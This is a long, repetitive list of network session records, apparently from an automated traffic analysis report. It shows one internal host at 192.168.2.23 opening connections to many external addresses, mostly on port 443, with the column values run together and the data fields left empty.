                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28172192.168.2.233822251.119.159.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28173192.168.2.2333230190.5.113.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28174192.168.2.2351938162.146.245.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28175192.168.2.234264861.113.154.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28176192.168.2.2333564169.14.45.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28177192.168.2.2354400161.173.65.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28178192.168.2.235203412.41.33.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28179192.168.2.235332444.111.204.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28180192.168.2.2351404126.180.91.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28181192.168.2.2347770172.52.89.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28182192.168.2.235269492.109.19.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28183192.168.2.234338473.150.151.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28184192.168.2.2351942174.242.212.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28185192.168.2.2340190108.53.194.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28186192.168.2.2343124121.246.177.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28187192.168.2.2349914115.47.203.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28188192.168.2.2352366206.121.153.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28189192.168.2.2358718159.219.164.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28190192.168.2.2352052176.88.169.1808080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28191192.168.2.2341026163.18.106.1988080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28192192.168.2.236060247.124.160.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28193192.168.2.23376245.185.123.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28194192.168.2.233616680.81.126.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28195192.168.2.234118878.244.112.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28196192.168.2.2346278155.243.220.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28197192.168.2.2337972141.39.34.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28198192.168.2.234293435.216.244.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28199192.168.2.234318248.12.173.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28200192.168.2.2345302141.227.145.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28201192.168.2.2355038130.76.195.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28202192.168.2.233890285.24.118.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28203192.168.2.2339456203.107.140.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28204192.168.2.23517284.23.0.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28205192.168.2.2351556134.35.233.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28206192.168.2.2357068219.122.102.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28207192.168.2.2336112155.139.212.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28208192.168.2.2352888182.31.103.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28209192.168.2.2334382168.128.251.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28210192.168.2.2350084197.107.130.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28211192.168.2.233841092.84.240.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28212192.168.2.235480463.153.199.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28213192.168.2.234302832.105.119.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28214192.168.2.2358634119.84.18.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28215192.168.2.2347796216.196.32.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28216192.168.2.235089019.237.212.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28217192.168.2.2338710110.208.64.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28218192.168.2.233575258.61.224.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28219192.168.2.2335626118.189.153.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28220192.168.2.2344580133.91.106.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28221192.168.2.2347560174.234.230.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28222192.168.2.233626682.51.121.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28223192.168.2.235322249.76.155.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28224192.168.2.2335186186.55.18.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28225192.168.2.235141644.165.243.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28226192.168.2.2334914162.200.195.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28227192.168.2.2347642102.84.129.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28228192.168.2.2340792168.38.46.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28229192.168.2.2354064170.204.80.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28230192.168.2.233958697.89.159.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28231192.168.2.235283488.150.45.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28232192.168.2.2354644105.185.167.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28233192.168.2.2354598195.49.53.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28234192.168.2.2349072101.201.162.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28235192.168.2.235126468.144.27.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28236192.168.2.234657072.169.130.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28237192.168.2.2333500157.151.230.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28238192.168.2.236083685.148.23.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28239192.168.2.2359608125.47.40.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28240192.168.2.2338416184.102.65.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28241192.168.2.2339894191.213.101.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28242192.168.2.2350910117.103.164.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28243192.168.2.2340636142.249.9.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28244192.168.2.23353025.198.162.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28245192.168.2.2333258116.155.248.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28246192.168.2.234174294.37.154.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28247192.168.2.233330054.231.82.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28248192.168.2.234277423.42.15.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28249192.168.2.2352208199.29.3.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28250192.168.2.2354974199.126.28.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28251192.168.2.2340578126.98.126.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28252192.168.2.2357342217.253.107.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28253192.168.2.2347978154.220.23.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28254192.168.2.2350672203.222.66.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28255192.168.2.2338148119.47.151.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28256192.168.2.2350748174.35.80.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28257192.168.2.234439661.37.61.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28258192.168.2.2342030136.43.46.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28259192.168.2.235483843.52.215.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28260192.168.2.2348408121.10.199.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28261192.168.2.2354106107.176.116.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28262192.168.2.235947892.6.5.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28263192.168.2.2357776145.132.131.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28264192.168.2.233906032.100.206.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28265192.168.2.2360604205.152.174.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28266192.168.2.2333748142.127.50.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28267192.168.2.2359226159.137.225.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28268192.168.2.234640220.53.253.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28269192.168.2.233663444.144.79.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28270192.168.2.234180443.179.0.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28271192.168.2.2337564205.153.190.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28272192.168.2.2333634179.159.41.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28273192.168.2.2346144131.108.121.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28274192.168.2.2343268198.26.91.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28275192.168.2.2354552118.204.32.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28276192.168.2.2333478178.107.100.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28277192.168.2.2355652134.136.151.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28278192.168.2.2337934102.191.19.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28279192.168.2.2348360101.206.156.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28280192.168.2.234961072.66.96.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28281192.168.2.235626457.25.198.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28282192.168.2.2338516174.227.181.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28283192.168.2.2337858205.115.43.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28284192.168.2.235655880.77.72.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28285192.168.2.236079218.251.121.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28286192.168.2.23568681.75.81.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28287192.168.2.2342772165.38.79.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28288192.168.2.234993437.177.89.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28289192.168.2.2342274144.188.133.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28290192.168.2.233382094.36.117.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28291192.168.2.2338804156.43.200.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28292192.168.2.236079693.129.3.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28293192.168.2.2351336109.230.197.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28294192.168.2.235919293.76.153.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28295192.168.2.23432841.167.117.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28296192.168.2.235573861.115.55.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28297192.168.2.2360958183.216.125.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28298192.168.2.2342842105.29.217.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28299192.168.2.2341082129.171.205.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28300192.168.2.2356620179.164.40.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28301192.168.2.2340702174.79.103.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28302192.168.2.236030432.161.124.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28303192.168.2.234849269.249.8.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28304192.168.2.2350676123.137.168.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28305192.168.2.235640027.134.71.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28306192.168.2.2343920184.103.244.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28307192.168.2.2357092167.12.146.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28308192.168.2.2334636199.202.74.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28309192.168.2.233970888.161.241.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28310192.168.2.2360116122.175.64.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28311192.168.2.2358454220.220.106.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28312192.168.2.2343946129.82.174.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28313192.168.2.2339944155.226.38.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28314192.168.2.2339212186.224.206.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28315192.168.2.235551290.187.225.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28316192.168.2.234762053.98.15.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28317192.168.2.2340964165.66.131.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28318192.168.2.233871842.230.111.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28319192.168.2.236006425.245.198.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28320192.168.2.2349732186.200.86.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28321192.168.2.2334462208.38.115.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28322192.168.2.2353234128.135.231.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28323192.168.2.2340916100.218.179.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28324192.168.2.2334342166.139.87.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28325192.168.2.2353542146.109.3.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28326192.168.2.2353282186.222.154.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28327192.168.2.233844495.191.161.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28328192.168.2.2358928149.241.199.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28329192.168.2.235463686.69.190.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28330192.168.2.2352122197.186.185.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28331192.168.2.2342148185.4.255.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28332192.168.2.236061614.197.217.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28333192.168.2.2338582125.54.148.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28334192.168.2.233397670.107.183.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28335192.168.2.2337954131.149.166.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28336192.168.2.2342196220.181.194.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28337192.168.2.234434042.96.251.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28338192.168.2.236062624.208.91.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28339192.168.2.2339286207.211.58.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28340192.168.2.2333598140.237.184.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28341192.168.2.2359740191.43.174.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28342192.168.2.2335898122.241.116.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28343192.168.2.2359440196.203.102.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28344192.168.2.23463744.10.231.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28345192.168.2.2351328212.148.176.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28346192.168.2.234993039.41.31.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28347192.168.2.235482264.78.246.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28348192.168.2.2341596139.96.124.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28349192.168.2.234750094.242.198.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28350192.168.2.2335974217.226.72.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28351192.168.2.23578848.5.212.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28352192.168.2.2334184181.2.218.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28353192.168.2.2338638111.162.29.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28354192.168.2.235557291.60.66.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28355192.168.2.234004227.68.175.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28356192.168.2.2337258187.54.120.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28357192.168.2.2360792175.105.86.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28358192.168.2.2335872172.244.82.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28359192.168.2.2351422159.172.29.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28360192.168.2.2345942135.132.215.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28361192.168.2.2334166183.138.38.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28362192.168.2.233383091.182.152.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28363192.168.2.234275824.142.161.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28364192.168.2.233589220.71.195.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28365192.168.2.2345114144.78.216.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28366192.168.2.235978096.115.197.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28367192.168.2.2359142168.194.83.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28368192.168.2.233820082.3.136.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28369192.168.2.2334526213.221.191.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28370192.168.2.233386012.0.216.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28371192.168.2.2346166203.188.131.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28372192.168.2.2332896221.77.157.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28373192.168.2.233928219.45.146.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28374192.168.2.2355096140.165.154.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28375192.168.2.2360940133.134.211.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28376192.168.2.2346184106.197.205.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28377192.168.2.2347752189.100.135.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28378192.168.2.233840818.156.161.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28379192.168.2.23366784.222.51.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28380192.168.2.2337838172.73.249.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28381192.168.2.2343184139.0.242.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28382192.168.2.234097845.47.90.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28383192.168.2.2353828159.68.203.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28384192.168.2.233703661.162.202.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28385192.168.2.2345814150.0.75.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28386192.168.2.235171441.91.102.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28387192.168.2.234512635.213.198.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28388192.168.2.2348024109.235.0.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28389192.168.2.234593837.157.217.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28390192.168.2.235330689.70.243.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28391192.168.2.233384665.168.156.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28392192.168.2.2358488195.132.130.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28393192.168.2.2335326182.244.107.106443
